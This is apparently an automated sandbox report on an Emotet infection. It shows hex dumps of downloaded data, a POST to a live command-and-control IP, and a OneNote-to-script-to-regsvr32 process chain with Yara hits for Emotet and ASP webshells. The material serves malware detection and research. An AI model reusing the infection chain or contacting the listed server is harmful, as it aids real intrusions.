F`;E7dO5SMl7H88Y,4HO4cy^ghLOQ1gUVm)pik(BJ`'Sy&esYqxWXafF[g'u]%[qPA<Puuv^DEL>w}7DSZS9?5Fuetq2muvx~J
2023-03-17 08:11:51 UTC	232	IN	Data Raw: 8b bb ec 64 35 f1 1e c6 b2 d6 6f 99 f9 82 66 f3 fe c2 77 eb 0c a3 b4 31 91 4d 6f a6 c3 a9 55 c1 52 29 71 a8 19 eb 2e e0 e0 11 d5 30 d6 38 ba 7e cf 55 60 e2 21 1d 0f a0 34 82 c8 07 11 5c fa 3d d8 1d b7 25 d8 65 da 07 d8 09 b8 34 63 48 ea 29 cd f3 17 02 65 df f8 eb d7 94 a2 7c d7 8f d7 62 41 82 50 9c 7a f3 f4 e3 3d 68 30 21 d0 07 dc da b7 62 6b bf fa 50 35 7a 92 4b ad 27 c5 26 c0 5e 60 39 3f a0 34 8a 7a 8b 3a 30 83 91 ea a7 c3 97 8f e2 1a 42 34 a1 e2 9c 94 ff a6 21 d1 20 0a 26 45 b6 01 b7 6f 42 9a c6 be 6e 95 48 2b bc ca b5 1c 9c 36 d8 49 8c 62 21 6b 42 f3 0d db 83 a4 00 61 e5 70 92 b5 1b 45 37 c5 16 c0 65 80 39 3f aa 04 8a 8e 55 08 5a f0 0d d4 8f d6 55 1e aa 14 aa bf 0d d7 8a 55 59 61 64 f2 3f bf 59 73 37 44 1b a3 b3 2d b4 7a d3 b0 07 ad 53 7d fd 35 5c 04 Data Ascii: d5ofw1MoUR)q.08~U`!4\=%e4cH)e\|bAPz=h0!bkP5zK'&^`9?4z:0B4! &EoBnH+6Ib!kBapE7e9?UZUUYad?Ys7D-zS}5\
2023-03-17 08:11:51 UTC	240	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	240	IN	Data Raw: 34 30 30 30 0d 0a fb 2c 14 09 e3 d0 34 48 f4 26 4f 2c ed 84 35 7a 94 62 61 07 6e 93 28 6b 2d bc ff 5e 2e a5 05 67 15 8c f3 78 3c e0 d6 80 b3 8b 10 fb 8d 4a 36 f5 ea 44 45 44 b1 5e ac d9 c4 73 60 73 4b 3c 9a c6 be 67 55 42 b7 a6 7f 49 f0 0c 18 79 9c a6 ca de 96 06 10 6c 1b f1 6b 00 e0 28 11 5e 94 c3 cb 85 c5 27 0c 4f cd 02 b7 99 fa 26 65 67 be 30 55 58 d4 72 c4 96 cf 69 d8 47 b8 4b 32 62 23 8b b6 2c be b1 1b ad 19 13 14 1b ab af 25 66 77 d4 91 ae c8 0f 11 7c 24 30 b7 b5 74 eb dc 41 96 07 c4 b8 3f 62 6b 33 a1 ed 70 8e 94 63 55 9a 6b 53 28 ea 10 29 79 24 3b 98 80 2e 25 7b f0 0d 2c 38 c7 5e 99 aa 14 52 bd 0d df a5 2e 10 7a 81 35 7a d2 63 55 cf 85 ac d7 ea 20 29 ad 56 8e 9d c0 36 25 d9 fc d8 ab d2 79 78 b9 64 b9 85 71 a8 57 47 6b 00 d9 39 74 36 fd ad 08 d7 b3 Data Ascii: 4000,4H&O,5zban(k-^.gx<J6DED^s`sK<gUBIylk(^'O&eg0UXriGK2b#,%fw\|$0tA?bk3pcUkS()y$;.%{,8^R.z5zcU )V6%yxdqWGk9t6
2023-03-17 08:11:51 UTC	248	IN	Data Raw: d8 63 96 bc 11 14 a3 26 aa b0 7b 0f 59 a5 05 67 15 54 71 78 3c b1 c0 be cf de e9 76 77 48 33 8b 7a ff 9e 9b f2 3f 98 43 4a 37 44 eb e3 00 4d 96 b4 66 ba 95 a0 68 ff a5 98 7b f6 98 d5 6d b9 6c 9a 83 59 83 39 a3 06 cb 67 e5 40 b1 86 1f 17 69 c5 26 e3 90 41 63 61 ec 34 a5 2e c0 35 74 1a 3d fb 0a b5 2d f7 99 68 cc d7 70 b8 2f ac f7 80 a5 df 7e da 73 82 f6 29 94 2a ea 10 fe 29 a0 71 62 86 06 fa d4 2c 78 3c 32 79 a7 12 a8 14 8d b5 3d fc 2e 97 04 61 a3 70 3d 57 4f 45 37 2f 16 6f 31 ec 7c 78 aa 34 25 13 a2 35 74 b0 15 7b 54 57 2d 77 3c d8 07 73 c9 46 25 7d 3e 68 64 be 3f 14 62 ce 7a 8b 17 a3 2e a2 b2 72 e0 f8 26 65 6b 7d fd 2d 5c 1c b1 de df 30 21 e9 e1 21 48 33 8b 38 fe 9e 9b 7d f1 16 c9 0d be 01 5c ef 2e 22 28 cf 2b 71 e3 04 04 b4 38 71 78 bd 1c 7b 06 78 de ae Data Ascii: c&{YgTqx<vwH3z?CJ7DMfh{mlY9g@i&Aca4.5t=-hp/~s)*)qb,x<2y=.ap=WOE7/o1\|x4%5t{TW-w<sF%}>hd?bz.r&ek}-\0!!H38}\."(+q8qx{x
2023-03-17 08:11:51 UTC	256	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	256	IN	Data Raw: 34 30 30 30 0d 0a 8c 9a 33 62 aa a5 41 62 35 7a 5f a7 c0 17 42 53 28 dd e6 c6 c0 aa fc 42 47 43 35 a1 c1 76 82 d8 89 48 36 21 51 46 38 6e 8c a5 ee 18 67 64 35 aa 56 26 45 bc c1 4b 2e 6b 65 b4 33 eb 72 ab c8 ce 2d 72 71 78 74 d4 71 fc b1 a4 49 44 34 48 96 81 94 ff a0 c1 2d 7c 53 26 43 b6 f1 4b 2e 6b 65 8f c5 32 71 a5 c4 53 33 74 71 c7 f9 59 3c e9 b5 31 57 42 34 77 b0 9d 94 81 e4 74 33 7a 53 cc b6 c8 bb d2 ad 7b 63 39 3f 49 ec 9d be 82 98 64 77 78 3c 5f bd dd 20 27 51 42 aa b0 ce 61 e0 85 71 62 35 7a da 62 61 77 0c d8 6d f3 2d b0 7b 0f 49 e9 c4 5b 33 74 71 f1 78 7d 0c e3 b5 01 57 42 34 c1 77 46 43 8b e4 4c 33 7a 53 af 01 13 64 bb 62 0d 9b c6 ba eb 7e e7 01 42 35 74 b6 3d bc 62 4f 68 30 99 2c 4e fa 8f b2 2f eb 71 94 14 cf f1 1e a6 b2 d6 fc 56 69 7b 61 f8 d5 Data Ascii: 40003bAb5z_BS(BGC5vH6!QF8ngd5V&EK.ke3r-rqxtqID4H-\|S&CK.ke2qS3tqY<1WB4wt3zS{c9?Idwx<_ 'QBaqb5zbawm-{I[3tqx}WB4wFCL3zSdb~B5t=bOh0,N/qVi{a
2023-03-17 08:11:51 UTC	264	IN	Data Raw: 6d 1c ee 6c 90 a0 3c 1d c8 07 11 54 99 49 4b a7 c3 af 75 56 dc a8 34 48 b2 27 1c fe ce 9b ca 11 16 51 23 be 01 24 43 2e 12 48 b6 6e 06 e9 04 34 b8 78 31 c0 9d f9 9c c8 f1 c0 55 cb 79 3f b2 17 1c d2 41 c6 2d bd 16 89 53 0d 44 53 a3 26 ca ce de ea 9b 67 c8 16 9a f5 04 d7 ca 7b 37 68 f7 64 f6 99 57 48 33 e3 2e a7 09 df 35 7a d2 53 e2 da b1 59 28 ac 20 46 58 42 71 62 c0 06 4a cc bc 78 3c 15 b7 a7 b1 54 2e bc 3d 49 33 e9 2e 7f 25 ef 70 dd d8 73 ea de 19 a8 d7 94 a2 7c 48 5b 78 62 41 82 50 03 7f 13 79 2e 37 e1 75 56 3a 07 43 20 ba 27 1c 81 14 13 a5 99 7d ad ce 72 33 bb 50 40 9a c6 f8 6e 06 90 bd 43 35 f5 34 0f a4 f5 c3 97 78 aa 89 c3 41 3f f2 8f 29 4d ea 21 42 f3 16 c9 82 72 33 d1 f6 6b 65 f8 52 5c 75 e3 34 34 dc 79 71 78 b7 1c 4b e1 75 d2 96 07 43 df b7 62 6b Data Ascii: ml<TIKuV4H'Q#$C.Hn4x1Uy?A-SDS&g{7hdWH3.5zSY( FXBqbJx<T.=I3.%ps\|H[xbAPy.7uV:C '}r3P@nC54xA?)M!Br3keR\u44yqxKuCbk
2023-03-17 08:11:51 UTC	272	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	272	IN	Data Raw: 34 30 30 30 0d 0a 61 2c bc 32 63 6e c0 fe 4b d6 07 69 65 39 87 e8 39 62 41 aa db 89 8e 87 fb 1c 24 01 f6 21 51 83 51 50 38 e3 2e 18 a6 3e ca 85 d2 6b 5d 8c fe dd aa ea 10 21 77 e7 cc e4 86 06 15 e2 c6 78 3c d8 79 48 48 f3 ae bd 8e 08 33 62 6b c1 0c 44 36 fb 26 06 34 53 4d 53 a3 2e 45 b2 7a 33 99 11 32 bc ca 3c f8 7d 7c 26 3c 68 78 a4 91 4d b0 99 32 62 6b b8 3a af 35 7a ba ad b8 c8 bb 94 6d 4b 75 60 3f 2b c9 e7 51 01 3d ff 3c 58 cb b8 84 ed 20 63 59 69 fe 99 da 61 a1 c1 88 61 bc 37 73 e7 28 17 4c d2 65 4b 85 49 49 db f0 17 61 f8 33 00 81 bf 79 41 0f f1 30 21 d0 07 2c 2d 3d 62 6b c1 0c 7c 31 f1 1e 3e b2 d6 6f 99 f9 82 66 f3 fe c2 75 eb 0c 5b f4 19 69 7e bd 2c 24 89 e2 22 51 85 71 60 48 20 6b 00 a0 01 1d 74 d2 63 6d a2 9b 53 28 ea 10 11 46 88 e7 72 86 06 05 Data Ascii: 4000a,2cnKie99bA$!QQP8.>k]!wx<yHH3bkD6&4SMS.Ez32<}\|&<hxM2bk:5zmKu`?+Q=<X cYiaa7s(LeKIIa3yA0!,-=bk\|1>ofu[i~,$"Qq`H ktcmS(Fr
2023-03-17 08:11:51 UTC	280	IN	Data Raw: 8e 2a c8 46 c3 10 71 78 78 d2 f3 2c bb e7 19 c9 e7 00 b8 af 27 8d 3d 40 55 33 d8 7d 55 7e cf 38 30 22 ee 4a 1f 62 fa 81 1e 0b ca 94 bd b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 76 ce b3 60 f3 28 6b 65 71 b4 97 55 ca 41 43 35 3c fa e4 18 c9 3c 68 30 68 d8 39 c4 c1 77 46 2b 8b e5 40 ad 7a 53 26 cc 73 60 6b a3 ef 41 b1 3f 2b 71 2b c8 18 ed fd 35 5c 14 d2 b8 4c b0 21 51 42 8e 4c 32 62 6b 49 ea 8d 7c f1 a3 af 01 13 64 bb 20 25 9a c6 85 45 e6 9b b2 84 71 50 19 a7 c6 59 3c 80 b2 47 af bd 78 c3 fc 2e e0 c5 db 60 34 7a 53 6e ce fc 0c da 9c 4f e5 39 3f 2b 39 e9 1d 67 55 3c fa 14 18 29 74 e3 44 05 29 0a b7 8c 63 3d 23 ff 81 a8 79 f1 8f 6f cc 6c 4c 1a a1 00 75 70 b6 58 69 2b c8 38 15 35 27 30 bf b5 4c e3 b4 05 b1 42 34 48 7b e9 c7 24 89 64 35 7a 17 Data Ascii: *Fqxx,'=@U3}U~80"Jbp!zY#++sA3}v`(keqUAC5<<h0h9wF+@zS&s`kA?+q+5\L!QBL2bkI\|d %EqPY<Gx.`4zSnO9?+9gU<)tD)c=#yolLupXi+85'0LB4H{$d5z
2023-03-17 08:11:51 UTC	288	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	288	IN	Data Raw: 34 30 30 30 0d 0a a9 be 01 a7 ef 2e 75 f6 7b 2b 71 e3 34 53 1a 03 a8 63 84 da 82 c8 1f aa 04 52 c3 aa f2 88 68 89 34 74 b4 0f 43 42 87 03 e1 d2 5d 7b fc b9 a7 8e fa 27 51 ca 70 64 b6 3d 1c ff 7d 45 2d e6 14 a2 d5 20 72 59 ac 45 79 b7 6d 99 b5 e1 00 1f a5 3b 82 f9 a2 7c 2f 91 b2 62 41 82 50 64 61 f3 79 49 fd 88 37 a8 14 52 b5 3d 23 3f e2 09 bc ef 70 6a da 63 55 bc 09 4b a3 2e 45 0a f7 6a f8 6a 86 06 25 69 40 78 3c d8 79 78 7e dc 51 42 b5 0d 23 80 35 00 61 0f 70 6a 3e af 00 27 c5 1e 38 89 5b 20 77 aa 04 72 f7 f5 85 3c fa 3d 2c d0 79 78 bb 6c 79 c9 71 a8 00 aa 2a 89 29 60 f2 3f 43 34 73 37 44 92 4d 7b 63 b2 7a 3b fc 6e 81 40 fc fd 3c 68 bd 1c 2c bb 1a de ae c3 71 58 60 7c 94 ff e0 11 25 01 40 de 45 bc 01 43 a1 2e 75 71 bc ef 51 3f 82 8f f9 b8 39 fb d0 71 fb Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;\|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`\|%@EC.uqQ?9q
2023-03-17 08:11:51 UTC	296	IN	Data Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c Data Ascii: -h5DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?\|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdplsE,>wrl
2023-03-17 08:11:51 UTC	304	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	304	IN	Data Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2 Data Ascii: 16009=+eACVqxH>hQB\|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq\|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49708	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-17 08:12:45 UTC	310	OUT	POST /wviitvvypaw/exnwmeb/fqgitydelxiavmv/ HTTP/1.1 Connection: Keep-Alive Content-Length: 0 Host: 182.162.143.56
2023-03-17 08:12:47 UTC	310	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 17 Mar 2023 08:12:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2023-03-17 08:12:47 UTC	310	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ONENOTE.EXEPID: 4884, Parent PID: 3320

General

Target ID:	0
Start time:	09:11:21
Start date:	17/03/2023
Path:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_4.one
Imagebase:	0x190000
File size:	1676072 bytes
MD5 hash:	8D7E99CB358318E1F38803C9E6B67867
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6124, Parent PID: 4884

General

Target ID:	10
Start time:	09:11:46
Start date:	17/03/2023
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Imagebase:	0xdd0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 0000000A.00000003.350591261.00000000056C7000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.350591261.00000000056C7000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 0000000A.00000003.340162075.00000000056C4000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.340162075.00000000056C4000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 0000000A.00000003.339776726.00000000056BD000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.339776726.00000000056BD000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000002.354227381.00000000056C8000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 0000000A.00000003.341613942.00000000056C4000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.341613942.00000000056C4000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.349899661.000000000588F000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1048, Parent PID: 6124

General

Target ID:	11
Start time:	09:11:51
Start date:	17/03/2023
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll
Imagebase:	0xbf0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 604, Parent PID: 1048

General

Target ID:	12
Start time:	09:11:51
Start date:	17/03/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll"
Imagebase:	0x7ff6c6740000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.327461788.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5084, Parent PID: 604

General

Target ID:	13
Start time:	09:11:56
Start date:	17/03/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BqnZyHskpeTuo\PjkJxfQvhUP.dll"
Imagebase:	0x7ff6c6740000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.571771558.0000000001041000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.571413418.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: ONENOTEM.EXEPID: 912, Parent PID: 4884

General

Target ID:	14
Start time:	09:12:00
Start date:	17/03/2023
Path:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Wow64 process (32bit):	true
Commandline:	/tsr
Imagebase:	0xf30000
File size:	157872 bytes
MD5 hash:	DBCFA6F25577339B877D2305CAD3DEC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ONENOTEM.EXEPID: 3920, Parent PID: 3320

General

Target ID:	15
Start time:	09:12:09
Start date:	17/03/2023
Path:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr
Imagebase:	0xf30000
File size:	157872 bytes
MD5 hash:	DBCFA6F25577339B877D2305CAD3DEC3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 604, Parent PID: 1048COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	7.5%
Signature Coverage:	6%
Total number of Nodes:	332
Total number of Limit Nodes:	11

Executed Functions

Function 00580000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 00580344
VirtualAlloc.KERNELBASE ref: 0058038A
VirtualAlloc.KERNELBASE ref: 005803A4
VirtualProtect.KERNELBASE ref: 0058085C
RtlAddFunctionTable.KERNEL32 ref: 005808E9

Strings

onTa, xrefs: 00580148
o, xrefs: 0058012E
eSys, xrefs: 00580117
hIns, xrefs: 005800EB
truc, xrefs: 005800F2
ddFu, xrefs: 0058013A
tion, xrefs: 005800F9
Load, xrefs: 00580095
lloc, xrefs: 005800BD
ct, xrefs: 005800DD
Slee, xrefs: 00580084
aryA, xrefs: 005800A5
Virt, xrefs: 005800C5
Flus, xrefs: 005800E4
Virt, xrefs: 005800AD
ualA, xrefs: 005800B5
GetN, xrefs: 00580107
Libr, xrefs: 0058009D
RtlA, xrefs: 00580133
rote, xrefs: 005800D5
Cach, xrefs: 00580100
nf, xrefs: 00580127
temI, xrefs: 0058011F
ualP, xrefs: 005800CD
ativ, xrefs: 0058010F
ncti, xrefs: 00580141

Memory Dump Source

Source File: 0000000C.00000002.327456876.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_580000_regsvr32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 394283112-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 630cd03e982111cc1b0d0254aabb76bef53f869521182810a8057f53a9cb5f4f
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 60521730618B088BDB59EF18D8857BABBF0FB54304F14562DE88BD7251EB34E546CB86

Uniqueness

Uniqueness Score: -1.00%

Function 005D709C Relevance: 11.5, Strings: 9, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_o, xrefs: 005D70C1
$, xrefs: 005D725F
xD, xrefs: 005D70C9
k|, xrefs: 005D7446
8, xrefs: 005D7172
#Vk, xrefs: 005D731C
U[, xrefs: 005D72BB
_L, xrefs: 005D74B0
W(P, xrefs: 005D727F

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
API String ID: 0-383957222
Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
Instruction ID: cc0b61f8640f1d85796863956392effbfa27a8fbb2be9e80f26594ed5d80abfd
Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
Instruction Fuzzy Hash: 0DC1CD71519780AFD388CF28C58A91BBBF1FBD4744F906A1DF89686260D7B4D909CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrFindResource_U.NTDLL ref: 0000000180010CCB
LdrAccessResource.NTDLL ref: 0000000180010CEB
NtAllocateVirtualMemory.NTDLL ref: 0000000180010D19

Strings

@, xrefs: 0000000180010CF5
ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk, xrefs: 0000000180010C3B
LXGUM, xrefs: 0000000180010C74

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: AccessAllocateFindMemoryResourceResource_Virtual
String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
API String ID: 2485490239-3005932707
Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00

Uniqueness

Uniqueness Score: -1.00%

Function 005C7D6C Relevance: 7.7, Strings: 6, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)s, xrefs: 005C7FA2
GX, xrefs: 005C7D80
3`d!, xrefs: 005C7DD8
lo, xrefs: 005C7D79
=, xrefs: 005C7D8E
)y_, xrefs: 005C7F29

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )s$)y_$3`d!$GX$lo$=
API String ID: 0-308291206
